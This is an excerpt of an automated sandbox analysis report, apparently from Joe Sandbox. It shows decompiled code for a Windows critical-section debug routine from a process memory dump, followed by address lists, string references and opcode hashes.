				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x04bcfdda
                                              0x04bcfde2
                                              0x04bcfde5
                                              0x04bcfdec
                                              0x04bcfdfa
                                              0x04bcfdff
                                              0x04bcfe0a
                                              0x04bcfe0f
                                              0x04bcfe17
                                              0x04bcfe1e
                                              0x04bcfe19
                                              0x04bcfe19
                                              0x04bcfe19
                                              0x04bcfe20
                                              0x04bcfe21
                                              0x04bcfe22
                                              0x04bcfe25
                                              0x04bcfe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BCFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BCFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BCFE01
                                              Memory Dump Source
                                              • Source File: 00000014.00000002.659028068.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: true
                                              • Associated: 00000014.00000002.659946040.0000000004C2B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000014.00000002.659974270.0000000004C2F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_20_2_4b10000_logagent.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 9c758bff1b830b25b028db6b3686360e020735e3c75e943af72cd36917386b6f
                                              • Instruction ID: d58588bf1bcd0d89e314507751841021aae068e8383bc9ed708248bfbb5429a0
                                              • Opcode Fuzzy Hash: 9c758bff1b830b25b028db6b3686360e020735e3c75e943af72cd36917386b6f
                                              • Instruction Fuzzy Hash: CCF0F632240212BFE6241A45DC46F33BF6AEB44731F244399F628561E1EA62F86096F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%